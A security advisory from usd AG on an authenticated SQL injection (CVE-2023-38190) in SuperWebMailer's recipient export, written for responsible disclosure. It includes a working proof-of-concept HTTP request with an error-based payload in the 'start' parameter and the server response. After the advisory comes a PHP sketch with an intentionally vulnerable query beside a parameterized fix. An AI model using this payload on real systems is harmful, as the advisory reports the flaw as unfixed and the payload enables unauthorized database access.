{"id":21190,"date":"2023-10-20T15:00:44","date_gmt":"2023-10-20T13:00:44","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2023-0014\/"},"modified":"2023-10-23T09:57:47","modified_gmt":"2023-10-23T07:57:47","slug":"usd-2023-0014","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2023-0014\/","title":{"rendered":"usd-2023-0014"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.22.2\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n<h1>usd-2023-0014 | SQL Injection in SuperWebMailer<\/h1>\n<p><strong>Advisory ID<\/strong>: usd-2023-0014<br \/><strong>Product<\/strong>: SuperWebMailer<br \/><strong>Affected Version<\/strong>: 9.00.0.01710<br \/><strong>Vulnerability Type<\/strong>: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')<br \/><strong>Security Risk<\/strong>: HIGH<br \/><strong>Vendor URL<\/strong>: <a href=\"https:\/\/www.superwebmailer.de\">https:\/\/www.superwebmailer.de<\/a><br \/><strong>Vendor acknowledged vulnerability<\/strong>: No<br \/><strong>Vendor Status<\/strong>: Not fixed<br \/><strong>CVE number<\/strong>: CVE-2023-38190<br \/><strong>CVE Link<\/strong>: Pending<\/p>\n<h3>Description<\/h3>\n<p>SuperWebMailer is an online application for managing e-mail newsletters.<br \/>An authenticated SQL injection vulnerability was discovered during a penetration test.<br \/>In an SQL injection attack, malicious input is used to alter the queries the application sends to the database server.<\/p>\n<p>The application contains an 
export functionality that is vulnerable to an SQL injection attack.<br \/>This functionality takes the user-supplied <strong>start<\/strong> parameter (the offset of the LIMIT clause of the export query) and places it inside an SQL query without any encoding or filtering being applied.<br \/>Consequently, an attacker may alter the SQL query in unintended ways.<\/p>\n<h3>Proof of Concept<\/h3>\n<p>The following request contains an SQL injection payload in the <strong>start<\/strong> parameter that displays the database version. The payload completes the LIMIT offset and appends a PROCEDURE ANALYSE() clause, which MySQL-style SQL accepts after LIMIT; the nested extractvalue() call raises an XPath error whose message carries the result of version(). PROCEDURE ANALYSE() was removed in MySQL 8.0 but is still available in MariaDB, which the target runs:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\">POST \/exportrecipients.php HTTP\/2\nHost: swm.example.com\nCookie: PHPSESSID=8ko13lk184llt0rqop2pikbf55; smlswmCsrfToken=20YyMEiUeMAYAEA22yeme6EAYEeIM2UqiqIMiE\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:102.0) Gecko\/20100101 Firefox\/102.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 393\n\nsmlswmCsrfToken=20YyMEiUeMAYAEA22yeme6EAYEeIM2UqiqIMiE&amp;OneMailingListId=1&amp;MailingListName=Test+Empf%C3%A4ngerliste&amp;step=4&amp;Separator=%2C&amp;Header1Line=1&amp;AddQuotes=1&amp;ExportLines=200&amp;OnlyActiveRecipients=&amp;GroupsOption=1&amp;groups=&amp;fields%5Bu_EMail%5D=1&amp;fields%5Bu_FirstName%5D=1&amp;fields%5Bu_LastName%5D=1&amp;start=1,1+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1)%3b%23&amp;ExportRowCount=5<\/pre>\n<\/div>\n<p>The database version is printed in the response as part of an error message (the application's German labels SQL-Fehler and SQL-Anweisung mean \"SQL error\" and \"SQL statement\"); the echoed statement also shows exactly where the payload landed in the query:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\">HTTP\/2 200 OK\nServer: openresty\nDate: Sun, 25 Sep 2022 16:48:39 GMT\nContent-Type: text\/html; charset=utf-8\nContent-Length: 16149\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, max-age=0\nLast-Modified: Sun, 25 Sep 2022 16:48:39 GMT\nPragma: no-cache\nX-Frame-Options: SAMEORIGIN\nCache-Control: post-check=0, pre-check=0\nVary: Accept-Encoding\nX-Served-By: swm.example.com\n\n[...]\n<span class=\"hll\" style=\"background-color: #2c3b41\">                &lt;td colspan=\"2\"&gt;&lt;b&gt;SQL-Fehler:&lt;\/b&gt;&amp;nbsp;XPATH syntax error: ':10.5.15-MariaDB-0+deb11u1' 1105&lt;br \/&gt;&lt;br \/&gt;\n<\/span>                                &lt;b&gt;SQL-Anweisung:&lt;\/b&gt;&amp;nbsp;SELECT DISTINCT u_EMail, u_FirstName, u_LastName, **testempfngerliste_members**.**id** FROM **testempfngerliste_members**   ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);#, 200&lt;br \/&gt;&lt;br \/&gt;&lt;\/td&gt;\n[...]\n&lt;\/body&gt;&lt;\/html&gt;<\/pre>\n<\/div>\n<h3>Fix<\/h3>\n<p>SQL injection vulnerabilities can be prevented by using prepared statements with parameterized queries. Additionally, all input to the application should be treated as potentially dangerous and validated on the server side; for this endpoint, the start offset and the ExportLines row count are integers and should be validated as such before they reach the query. As no vendor fix was available at the time of publication (see Vendor Status above), operators should restrict the recipient export function to trusted administrative accounts.<\/p>\n<h3>References<\/h3>\n<p><a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/89.html\">https:\/\/cwe.mitre.org\/data\/definitions\/89.html<\/a><br \/><a href=\"https:\/\/owasp.org\/www-community\/attacks\/SQL_Injection\">https:\/\/owasp.org\/www-community\/attacks\/SQL_Injection<\/a><\/p>\n<h3>Timeline<\/h3>\n<ul>\n<li><strong>2022-09-26<\/strong>: This vulnerability was discovered by Florian Dewald and Gerbert Roitburd of usd AG.<\/li>\n<li><strong>2023-04-20<\/strong>: First contact request via info@superwebmailer.de.<\/li>\n<li><strong>2023-05-08<\/strong>: Reminder sent via info@superwebmailer.de and contact form.<\/li>\n<li><strong>2023-05-15<\/strong>: Second reminder to webmaster@wt-rate.com and info@superwebmailer.de.<\/li>\n<li><strong>2023-05-25<\/strong>: Another reminder sent to info@superwebmailer.de, webmaster@wt-rate.com and info@wt-rate.com.<\/li>\n<li><strong>2023-06-05<\/strong>: Once more tried to inform the company of the vulnerabilities via the feedback form 
(info@superwebmailer.de).<\/li>\n<li><strong>2023-07-17<\/strong>: Sent another email to info@supermailer.de, webmaster@wt-rate.com, info@wt-rate.com and info@superwebmailer.de, stressing that CVEs had been assigned to the vulnerabilities and that disclosure might follow if we did not receive an answer soon.<\/li>\n<li><strong>2023-08-17<\/strong>: As the vulnerabilities were found during a pentest, the customer was asked whether or not the Responsible Disclosure Team should move forward without the software vendor's cooperation.<\/li>\n<li><strong>2023-10-02<\/strong>: Final notice given to info@superwebmailer, warning of imminent disclosure should there be no response within a week.<\/li>\n<li><strong>2023-10-20<\/strong>: Vulnerabilities disclosed by usd AG.<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p>This security vulnerability was identified by Florian Dewald and Gerbert Roitburd of usd AG.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2023-0014 | SQL Injection in SuperWebMailer Advisory ID: usd-2023-0014Product: SuperWebMailerAffected Version: 9.00.0.01710Vulnerability Type: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')Security Risk: HIGHVendor URL: https:\/\/www.superwebmailer.deVendor acknowledged vulnerability: NoVendor Status: Not fixedCVE number: CVE-2023-38190CVE Link: Pending Description SuperWebMailer is an online application for managing e-mail newsletters.An authenticated SQL injection vulnerability was 
[&hellip;]<\/p>\n","protected":false},"author":114,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-21190","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/21190","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/114"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=21190"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/21190\/revisions"}],"predecessor-version":[{"id":21197,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/21190\/revisions\/21197"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=21190"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
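The fix recommended in the advisory's Fix section, as an added example that is not part of the original advisory and not SuperWebMailer's own code: a PHP/PDO sketch of the vulnerable pattern (the request's start and ExportLines values interpolated straight into the LIMIT clause of the export query, which is what the echoed SQL-Anweisung in the proof of concept shows) next to a hardened version that validates both values as integers and binds them as typed parameters. The table name recipients, the DSN, the credentials and the column list are assumptions for illustration; the advisory's own query names a per-mailing-list members table.

```php
<?php
// Added example (not SuperWebMailer's code). Assumed: a MariaDB/MySQL table
// `recipients` with columns u_EMail, u_FirstName, u_LastName and id, and a
// DSN/credentials that are placeholders only.
declare(strict_types=1);

function connect(): PDO
{
    $pdo = new PDO('mysql:host=127.0.0.1;dbname=swm;charset=utf8mb4', 'swm', 'secret');
    // Throw on errors instead of returning false (so no raw SQL error text
    // is rendered into a page, as the advisory's response shows), and turn
    // emulated prepares off so placeholders are bound server-side: only then
    // are LIMIT values sent as integers rather than quoted strings.
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    return $pdo;
}

// VULNERABLE: the request parameters land verbatim in the LIMIT clause.
// With $start = "1,1 procedure analyse(...);#" the string built here is the
// statement echoed in the advisory's error message.
function exportVulnerable(PDO $pdo, string $start, string $count): array
{
    $sql = 'SELECT DISTINCT u_EMail, u_FirstName, u_LastName, id FROM recipients '
         . "ORDER BY id LIMIT {$start}, {$count}";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// FIXED: both values must be non-negative integers (the count additionally
// capped), and they are bound as PDO::PARAM_INT. The advisory's payload is
// rejected before any SQL is built; even if it slipped through, a bound
// parameter cannot change the statement's structure.
function exportFixed(PDO $pdo, string $start, string $count): array
{
    $offset = filter_var($start, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    $limit  = filter_var($count, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1, 'max_range' => 10000]]);
    if ($offset === false || $limit === false) {
        throw new InvalidArgumentException('start and ExportLines must be non-negative integers');
    }
    $stmt = $pdo->prepare(
        'SELECT DISTINCT u_EMail, u_FirstName, u_LastName, id FROM recipients '
        . 'ORDER BY id LIMIT :offset, :limit'
    );
    $stmt->bindValue(':offset', $offset, PDO::PARAM_INT);
    $stmt->bindValue(':limit', $limit, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage: feed the advisory's `start` payload to the hardened export.
$pdo = connect();
$payload = '1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);#';
try {
    exportFixed($pdo, $payload, '200');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ' . $e->getMessage() . "\n";
}
```

Two details matter in the hardened version beyond "use prepared statements": validating the values as integers rejects the payload at the boundary rather than relying on quoting, and disabling emulated prepares is what makes PDO send `:offset`/`:limit` as numeric parameters, since a quoted `'1'` after LIMIT is a syntax error in MariaDB and MySQL.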